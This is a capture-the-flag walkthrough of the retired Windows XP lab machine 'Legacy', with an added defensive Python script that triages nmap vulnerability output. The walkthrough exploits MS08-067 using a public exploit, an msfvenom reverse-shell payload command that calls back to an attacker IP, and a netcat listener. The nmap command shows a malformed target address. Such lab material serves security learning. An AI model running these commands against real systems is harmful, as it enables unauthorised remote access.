Legacy is one of the retired vulnerable machines and runs Windows. The goal is to obtain the user and root flags from it.
We start with an nmap network scan to identify the target machine and its open services.
Full Port Scan
The port scan found three open ports: 135/tcp (msrpc, Microsoft Windows RPC), 139/tcp (netbios-ssn, Microsoft Windows netbios-ssn) and 445/tcp (microsoft-ds, Windows XP microsoft-ds).
Since the target runs Windows XP, we can expect it to be vulnerable; let's run nmap's vuln scripts against the SMB port to see which vulnerability it has.
nmap -T5 10.10.10.10.4 -Pn -p 445 --script vuln -vvvv -oN vulnscan.txt
Vulnerability scan of the SMB port with the nmap vuln script category.
The scan reports the smb-vuln-ms08-067 vulnerability (MS08-067); let's see whether a proof-of-concept exploit exists for it.
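From a defender's side, the same nmap vuln-script output is the report that vulnerability management teams triage: which hosts have a confirmed-vulnerable SMB service, and which are still running an end-of-life operating system. The Python script below is an added example and is not code from the write-up or from the repositories it references. It parses a constructed sample of `nmap -oN` output (the addresses, banners and script states are made up for the example, not the real scan result) and returns the hosts that need patching or network isolation; the function and variable names are assumptions.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of "nmap -oN" output with smb-vuln script results.
# Hosts, banners and states are invented for this example.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.0.0.5
Host is up (0.012s latency).

PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Windows XP microsoft-ds

Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|_    State: VULNERABLE
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
|   NOT VULNERABLE:
|_    State: NOT VULNERABLE

Nmap scan report for 10.0.0.6
Host is up (0.010s latency).

PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Windows 10 microsoft-ds

Host script results:
|_smb-vuln-ms08-067: NOT VULNERABLE
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+\S+\s*(.*)$")
SCRIPT_RE = re.compile(r"^\|_?\s*(smb-vuln-[\w-]+):\s*(.*)$")
STATE_RE = re.compile(r"^\|_?\s*State:\s*(LIKELY VULNERABLE|NOT VULNERABLE|VULNERABLE)")

# Operating systems that no longer receive security updates (assumed list).
EOL_OS_MARKERS = ("Windows XP", "Windows 2000", "Windows Server 2003")


def parse_nmap_vuln_report(text: str) -> Dict[str, dict]:
    """Parse -oN output into {host: {"ports": {port: banner}, "scripts": {name: state}}}."""
    hosts: Dict[str, dict] = {}
    host = None
    script = None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            hosts[host] = {"ports": {}, "scripts": {}}
            script = None
            continue
        if host is None:
            continue
        m = PORT_RE.match(line)
        if m:
            hosts[host]["ports"][int(m.group(1))] = m.group(2).strip()
            continue
        m = SCRIPT_RE.match(line)
        if m:
            script, rest = m.group(1), m.group(2).strip().lower()
            # One-line results such as "|_smb-vuln-ms10-054: false".
            if rest in ("false", "not vulnerable"):
                hosts[host]["scripts"][script] = "NOT VULNERABLE"
            elif rest == "true":
                hosts[host]["scripts"][script] = "VULNERABLE"
            else:
                hosts[host]["scripts"].setdefault(script, "UNKNOWN")
            continue
        m = STATE_RE.match(line)
        if m and script:
            # Multi-line results carry the verdict on a "State:" line.
            hosts[host]["scripts"][script] = m.group(1)
    return hosts


def triage(hosts: Dict[str, dict]) -> List[Tuple[str, str, str]]:
    """Return (host, finding, detail) for vulnerable scripts and end-of-life OS banners."""
    findings = []
    for host, data in hosts.items():
        for script, state in data["scripts"].items():
            if state in ("VULNERABLE", "LIKELY VULNERABLE"):
                findings.append((host, script, state))
        for port, banner in data["ports"].items():
            if any(marker in banner for marker in EOL_OS_MARKERS):
                findings.append((host, f"eol-os-on-port-{port}", banner))
    return sorted(findings)


if __name__ == "__main__":
    for host, finding, detail in triage(parse_nmap_vuln_report(SAMPLE_NMAP_OUTPUT)):
        print(f"{host}\t{finding}\t{detail}")
```

Only `VULNERABLE` and `LIKELY VULNERABLE` states are reported, and the end-of-life check is deliberately a separate finding: a host that passes every vuln script but still runs Windows XP is a risk that no patch will fix, and the remediation is to decommission or isolate it rather than to wait for a vendor update.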
Let's look at the first GitHub repo.
We came across https://github.com/andyacer/ms08_067, which has a very clear README; I will follow the instructions it gives.
1- First, the repo was downloaded with git clone
git clone https://github.com/andyacer/ms08_067/
2- Then the Impacket tools were downloaded and installed, because the exploit depends on them
git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/
cd impacket
pip install .
3- The shellcode was generated with msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=4747 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x5f\x2f\x2e\x40" -f c -a x86 --platform Windows
4- The generated shellcode was pasted into the Python exploit file
5- A listener was started with nc on the port given as LPORT
6- The Python file was executed
After the exploit code ran, we got a shell.
Here we have the user and root flags.